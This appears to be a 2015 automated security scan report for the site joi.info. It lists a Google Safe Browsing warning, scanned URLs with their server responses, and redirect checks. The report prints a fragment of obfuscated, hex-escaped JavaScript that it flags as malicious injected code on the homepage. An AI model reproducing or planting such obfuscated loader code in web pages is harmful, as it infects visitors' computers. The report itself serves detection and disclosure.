Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=joi.info
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://joi.info/ | 200 OK Content-Length: 15366 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if('xaLu'=='JIBM')UmeqSu='wkTKJ';var UZSoKn=7;var iniPno;function OtkWK(){var HYmK='xRDFsu';if('tRJbEP'=='WVJP')gJcC();}function MDtf(){}
var APhFAG;var UcUDiTw="a\x70\x70endChild";var LLwP='KroTx';var hYfGM;var BTMZw=58;var nXqWh="b\x6fd\x79";function tdqK(){var mPuP='HpxW';if('oMFw'=='GhnShr')SPtffS();}var AGmfrj='yLqnz';var RLxAOm="par\x73eInt";var SbKVl;var RbTDgA;if('nIBcJV'=='CHsC')SBBToE();var uSlQv="fro\x6dCha\x72C\x6f\x64\x65";function vgjig(){}var HzaJd='oQcej';var appVersion_var= document[nXqWh][UcUDiTw](WpMJhNMG);function WwTGYK(){}var BqyKi;}else{var JsOIV=81;if('LmdP'=='fwwFXg')fXQh();setTimeout(FBGmeAs,120);var rWvMci;} function KjqoTt(){}} if('LlTtYH'=='hRKeod')xgcpZ='xaud';FBGmeAs();function fVfT(){var uYFRp='irZH';if('Tstsa'=='aSQvq')XWNOKI();}if('vldiji'=='tdMwq')XxjN();if('lfjrB'=='oGjncO')eYlybk='abZPVB';if('qcolY'=='oBEG')GBrw='izZdr';var gZKRTe; Antivirus reports:
| ||
http://calendar.pirontech.com/counter.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=864000 Connection: close Date: Mon, 12 Jan 2015 10:37:37 GMT Location: https://calendar.pirontech.com/counter.js Server: Apache Content-Length: 249 Content-Type: text/html; charset=iso-8859-1 Expires: Thu, 22 Jan 2015 10:37:37 GMT | clean |
https://calendar.pirontech.com/counter.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=864000 Connection: close Date: Mon, 12 Jan 2015 10:37:38 GMT Location: https://www.calendar.pirontech.com/counter.js Server: Apache Content-Length: 253 Content-Type: text/html; charset=iso-8859-1 Expires: Thu, 22 Jan 2015 10:37:38 GMT | clean |
https://www.calendar.pirontech.com/counter.js | 500 Can't connect to www.calendar.pirontech.com:443 Content-Length: 203 Content-Type: text/plain | clean |
http://www.calendar.pirontech.com/test404page.js | 500 Can't connect to www.calendar.pirontech.com:80 Content-Length: 201 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: joi.info
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Jan 2015 10:26:11 GMT
Server: Microsoft-IIS/4.0
Content-Type: text/html
X-Died: timeout at scan.pm line 1566.
GET / HTTP/1.1
Host: joi.info
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Jan 2015 10:26:11 GMT
Server: Microsoft-IIS/4.0
Content-Type: text/html
X-Died: timeout at scan.pm line 1566.
Second query (visit from search engine):
GET / HTTP/1.1
Host: joi.info
Referer: http://www.google.com/search?q=joi.info
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: joi.info
Referer: http://www.google.com/search?q=joi.info
Result:
The result is similar to the first query. There are no suspicious redirects found.